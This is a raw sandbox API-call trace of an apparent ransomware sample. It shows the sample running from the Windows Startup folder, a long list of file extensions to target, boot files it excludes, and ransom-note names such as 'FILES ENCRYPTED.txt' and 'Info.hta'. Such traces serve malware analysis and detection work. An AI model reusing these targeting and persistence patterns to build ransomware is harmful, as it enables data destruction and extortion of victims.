	[0136.767] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b758, Size=0x20) returned 0x7b200b8
	[0136.767] lstrlenW (lpString="Info.hta") returned 8
	[0136.767] lstrlenW (lpString="Info.hta") returned 8
	[0136.767] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b200b8 | out: hHeap=0x7ab0000) returned 1
	[0136.767] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b6b960, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe")) returned 0x69
	[0136.767] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b6b960 | out: hHeap=0x7ab0000) returned 1
	[0136.767] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b20330
	[0136.767] lstrlenW (lpString=".exe") returned 4
	[0136.767] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b770, Size=0x20) returned 0x7b1fd20
	[0136.768] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b770, Size=0x20) returned 0x7b200b8
	[0136.768] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b200b8, Size=0x40) returned 0x7b20378
	[0136.768] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20378, Size=0x80) returned 0x7b46540
	[0136.768] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46540, Size=0x100) returned 0x7b45208
	[0136.768] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0136.768] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b45208 | out: hHeap=0x7ab0000) returned 1
	[0136.768] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x7b6b960, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc
	[0136.768] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b7b968 | out: hHeap=0x7ab0000) returned 1
	[0136.768] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b6b960 | out: hHeap=0x7ab0000) returned 1
	[0136.768] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69a80, Size=0x8) returned 0x7b69a70
	[0136.768] lstrlenW (lpString="%windir%;") returned 9
	[0136.768] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1fd20 | out: hHeap=0x7ab0000) returned 1
	[0136.768] lstrlenW (lpString="C:\\Windows;") returned 11
	[0136.768] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b59550 | out: hHeap=0x7ab0000) returned 1
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b788, Size=0x20) returned 0x7b1fd20
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b20378
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20378, Size=0x80) returned 0x7b46540
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46540, Size=0x100) returned 0x7b45208
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ab0, Size=0x8) returned 0x7b69ac0
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ac0, Size=0x10) returned 0x7b6b7d0
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b7d0, Size=0x20) returned 0x7b1fd20
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69a80, Size=0x8) returned 0x7b69ac0
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69a90, Size=0x8) returned 0x7b69a80
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ab0, Size=0x8) returned 0x7b69ad0
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ad0, Size=0x10) returned 0x7b6b878
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b878, Size=0x20) returned 0x7b200b8
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ac0, Size=0x10) returned 0x7b6b878
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69a80, Size=0x10) returned 0x7b6b8a8
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ac0, Size=0x8) returned 0x7b69ab0
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ae0, Size=0x8) returned 0x7b69af0
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b878, Size=0x20) returned 0x7b42df8
	[0136.769] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b8a8, Size=0x20) returned 0x7b42da8
	[0136.770] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b00, Size=0x8) returned 0x7b69b10
	[0136.770] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91
	[0136.770] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b45208 | out: hHeap=0x7ab0000) returned 1
	[0136.770] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b6b920, Size=0x20) returned 0x7b42e20
	[0136.770] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x7b58548, nSize=0x7fff | out: lpDst="C:") returned 0x3
	[0136.770] lstrlenW (lpString="C:\\") returned 3
	[0136.770] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18f86c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f86c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0136.770] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58548 | out: hHeap=0x7ab0000) returned 1
	[0136.770] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b40, Size=0x82) returned 0x7b45370
	[0136.770] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b60, Size=0x100) returned 0x7b58948
	[0136.771] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b45370, Size=0x104) returned 0x7b58ae0
	[0136.771] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58948, Size=0x200) returned 0x7b58bf0
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b69b50 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58bf0 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b585d8 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b466d8 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58590 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46760 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b585c0 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58ae0 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b585a8 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b45400 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b585f0 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58a50 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58608 | out: hHeap=0x7ab0000) returned 1
	[0136.772] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58608, Size=0x20) returned 0x7b42e48
	[0136.772] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42e48, Size=0x40) returned 0x7b20378
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b69b20 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b6b920 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b452e0 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58560 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46650 | out: hHeap=0x7ab0000) returned 1
	[0136.772] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b6b938 | out: hHeap=0x7ab0000) returned 1
	[0136.799] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b69b30 | out: hHeap=0x7ab0000) returned 1
	[0136.799] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58578 | out: hHeap=0x7ab0000) returned 1
	[0136.799] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b42b88 | out: hHeap=0x7ab0000) returned 1
	[0136.799] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b41d88 | out: hHeap=0x7ab0000) returned 1
	[0136.799] lstrlenW (lpString="%systemdrive%") returned 13
	[0136.799] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b42e20 | out: hHeap=0x7ab0000) returned 1
	[0136.799] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46540 | out: hHeap=0x7ab0000) returned 1
	[0136.799] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b69b00 | out: hHeap=0x7ab0000) returned 1
	[0136.800] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x7b48528, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x12c
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58578, Size=0x20) returned 0x7b42fd8
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42fd8, Size=0x40) returned 0x7b20528
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20528, Size=0x80) returned 0x7b46540
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46540, Size=0x100) returned 0x7b58b70
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58b70, Size=0x200) returned 0x7b9b990
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b9b990, Size=0x400) returned 0x7b9b990
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b9b990, Size=0x800) returned 0x7b623e0
	[0136.800] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b623e0, Size=0x1000) returned 0x7b623e0
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b00, Size=0x8) returned 0x7b69b70
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69b70, Size=0x10) returned 0x7b58710
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58710, Size=0x20) returned 0x7b42fd8
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42fd8, Size=0x40) returned 0x7b20528
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20528, Size=0x80) returned 0x7b46540
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46540, Size=0x100) returned 0x7b58b70
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58b70, Size=0x200) returned 0x7babd98
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7babd98, Size=0x400) returned 0x7bac7a0
	[0136.801] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bac7a0, Size=0x800) returned 0x7badba8
	[0136.801] lstrlenW (lpString=".1cd;.3ds;.3fr;.3g2;.3gp;.7z;.accda;.accdb;.accdc;.accde;.accdt;.accdw;.adb;.adp;.ai;.ai3;.ai4;.ai5;.ai6;.ai7;.ai8;.anim;.arw;.as;.asa;.asc;.ascx;.asm;.asmx;.asp;.aspx;.asr;.asx;.avi;.avs;.backup;.bak;.bay;.bd;.bin;.bmp;.bz2;.c;.cdr;.cer;.cf;.cfc;.cfm;.cfml;.cfu;.chm;.cin;.class;.clx;.config;.cpp;.cr2;.crt;.crw;.cs;.css;.csv;.cub;.dae;.dat;.db;.dbf;.dbx;.dc3;.dcm;.dcr;.der;.dib;.dic;.dif;.divx;.djvu;.dng;.doc;.docm;.docx;.dot;.dotm;.dotx;.dpx;.dqy;.dsn;.dt;.dtd;.dwg;.dwt;.dx;.dxf;.edml;.efd;.elf;.emf;.emz;.epf;.eps;.epsf;.epsp;.erf;.exr;.f4v;.fido;.flm;.flv;.frm;.fxg;.geo;.gif;.grs;.gz;.h;.hdr;.hpp;.hta;.htc;.htm;.html;.icb;.ics;.iff;.inc;.indd;.ini;.iqy;.j2c;.j2k;.java;.jp2;.jpc;.jpe;.jpeg;.jpf;.jpg;.jpx;.js;.jsf;.json;.jsp;.kdc;.kmz;.kwm;.lasso;.lbi;.lgf;.lgp;.log;.m1v;.m4a;.m4v;.max;.md;.mda;.mdb;.mde;.mdf;.mdw;.mef;.mft;.mfw;.mht;.mhtml;.mka;.mkidx;.mkv;.mos;.mov;.mp3;.mp4;.mpeg;.mpg;.mpv;.mrw;.msg;.mxl;.myd;.myi;.nef;.nrw;.obj;.odb;.odc;.odm;.odp;.ods;.oft;.one;.onepkg;.onetoc2;.opt;.oqy;.orf;.p12;.p7b;.p7c;.pam;.pbm;.pct;.pcx;.pdd;.pdf;.pdp;.pef;.pem;.pff;.pfm;.pfx;.pgm;.php;.php3;.php4;.php5;.phtml;.pict;.pl;.pls;.pm;.png;.pnm;.pot;.potm;.potx;.ppa;.ppam;.ppm;.pps;.ppsm;.ppt;.pptm;.pptx;.prn;.ps;.psb;.psd;.pst;.ptx;.pub;.pwm;.pxr;.py;.qt;.r3d;.raf;.rar;.raw;.rdf;.rgbe;.rle;.rqy;.rss;.rtf;.rw2;.rwl;.safe;.sct;.sdpx;.shtm;.shtml;.slk;.sln;.sql;.sr2;.srf;.srw;.ssi;.st;.stm;.svg;.svgz;.swf;.tab;.tar;.tbb;.tbi;.tbk;.tdi;.tga;.thmx;.tif;.tiff;.tld;.torrent;.tpl;.txt;.u3d;.udl;.uxdc;.vb;.vbs;.vcs;.vda;.vdr;.vdw;.vdx;.vrp;.vsd;.vss;.vst;.vsw;.vsx;.vtm;.vtml;.vtx;.wb2;.wav;.wbm;.wbmp;.wim;.wmf;.wml;.wmv;.wpd;.wps;.x3f;.xl;.xla;.xlam;.xlk;.xlm;.xls;.xlsb;.xlsm;.xlsx;.xlt;.xltm;.xltx;.xlw;.xml;.xps;.xsd;.xsf;.xsl;.xslt;.xsn;.xtp;.xtp2;.xyze;.xz;.zip;") returned 1776
	[0136.801] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b623e0 | out: hHeap=0x7ab0000) returned 1
	[0136.801] lstrlenW (lpString="") returned 0
	[0136.801] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae3e0 | out: hHeap=0x7ab0000) returned 1
	[0136.801] lstrlenW (lpString=".bot") returned 4
	[0136.801] lstrlenW (lpString=".bot") returned 4
	[0136.801] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae3e0 | out: hHeap=0x7ab0000) returned 1
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae410, Size=0x20) returned 0x7b42fd8
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42fd8, Size=0x40) returned 0x7b20528
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20528, Size=0x80) returned 0x7b46540
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69cd0, Size=0x8) returned 0x7b69ce0
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ce0, Size=0x10) returned 0x7bae410
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae410, Size=0x20) returned 0x7b43028
	[0136.802] lstrlenW (lpString="boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;") returned 48
	[0136.802] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46540 | out: hHeap=0x7ab0000) returned 1
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae440, Size=0x20) returned 0x7b43050
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b43050, Size=0x40) returned 0x7b20528
	[0136.802] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0136.802] lstrlenW (lpString="FILES ENCRYPTED.txt") returned 19
	[0136.802] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b20528 | out: hHeap=0x7ab0000) returned 1
	[0136.802] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae440, Size=0x20) returned 0x7b43050
	[0136.802] lstrlenW (lpString="Info.hta") returned 8
	[0136.802] lstrlenW (lpString="Info.hta") returned 8
	[0136.802] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b43050 | out: hHeap=0x7ab0000) returned 1
	[0136.802] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x9f50048, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe")) returned 0x69
	[0137.111] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x9f50048 | out: hHeap=0x7ab0000) returned 1
	[0137.111] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b43028, Size=0x40) returned 0x7b205b8
	[0137.111] lstrlenW (lpString=".exe") returned 4
	[0137.111] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae518, Size=0x20) returned 0x7b43028
	[0137.111] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae518, Size=0x20) returned 0x7b430f0
	[0137.111] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b430f0, Size=0x40) returned 0x7b20600
	[0137.111] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20600, Size=0x80) returned 0x7b46540
	[0137.111] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46540, Size=0x100) returned 0x7b58b70
	[0137.111] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69
	[0137.111] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b58b70 | out: hHeap=0x7ab0000) returned 1
	[0137.111] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x9f50048, nSize=0x8000 | out: lpDst="C:\\Windows;") returned 0xc
	[0137.111] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x9f60050 | out: hHeap=0x7ab0000) returned 1
	[0137.112] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x9f50048 | out: hHeap=0x7ab0000) returned 1
	[0137.112] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ce0, Size=0x8) returned 0x7b69b20
	[0137.112] lstrlenW (lpString="%windir%;") returned 9
	[0137.112] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b43028 | out: hHeap=0x7ab0000) returned 1
	[0137.112] lstrlenW (lpString="C:\\Windows;") returned 11
	[0137.112] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b9b990 | out: hHeap=0x7ab0000) returned 1
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae530, Size=0x20) returned 0x7b43028
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b43028, Size=0x40) returned 0x7b20600
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20600, Size=0x80) returned 0x7b46540
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b46540, Size=0x100) returned 0x7b58b70
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69d00, Size=0x8) returned 0x7b69d10
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69d10, Size=0x10) returned 0x7bae578
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae578, Size=0x20) returned 0x7b43028
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ce0, Size=0x8) returned 0x7b69d10
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69cd0, Size=0x8) returned 0x7b69ce0
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69d00, Size=0x8) returned 0x7b69d20
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69d20, Size=0x10) returned 0x7bae620
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae620, Size=0x20) returned 0x7b430f0
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69d10, Size=0x10) returned 0x7bae620
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69ce0, Size=0x10) returned 0x7bae650
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69d10, Size=0x8) returned 0x7b69d00
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b69d30, Size=0x8) returned 0x7b69d40
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae620, Size=0x20) returned 0x7b43118
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae650, Size=0x20) returned 0x7b43140
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bac7b8, Size=0x8) returned 0x7bac7c8
	[0137.113] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae6c8, Size=0x20) returned 0x7b43190
	[0137.113] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x7b9b990, nSize=0x7fff | out: lpDst="C:") returned 0x3
	[0137.114] lstrlenW (lpString="C:\\") returned 3
	[0137.114] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x18f86c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18f86c*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0137.114] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b9b990 | out: hHeap=0x7ab0000) returned 1
	[0137.114] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bac7f8, Size=0x82) returned 0x7b60318
	[0137.114] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bac818, Size=0x100) returned 0x7b58b70
	[0137.114] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b60318, Size=0x104) returned 0x7b5ac78
	[0137.114] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58b70, Size=0x200) returned 0x7baebb0
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bac808 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7baebb0 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae770 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b46760 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae728 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b466d8 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae758 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b5ac78 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae740 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b5ab58 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae788 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b5abe8 | out: hHeap=0x7ab0000) returned 1
	[0137.115] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7bae7a0 | out: hHeap=0x7ab0000) returned 1
	[0137.116] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7bae7a0, Size=0x20) returned 0x7b431b8
	[0137.116] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b431b8, Size=0x40) returned 0x7b20600
	[0137.351] WaitForMultipleObjects (nCount=0x2, lpHandles=0x7b42a70*=0x12c, bWaitAll=1, dwMilliseconds=0xffffffff) 

Thread:
	id = 46
	os_tid = 0x72c


Thread:
	id = 48
	os_tid = 0x738

	[0136.790] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b58560
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b58560, Size=0x20) returned 0x7b42e48
	[0136.790] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b42e48, Size=0x40) returned 0x7b203c0
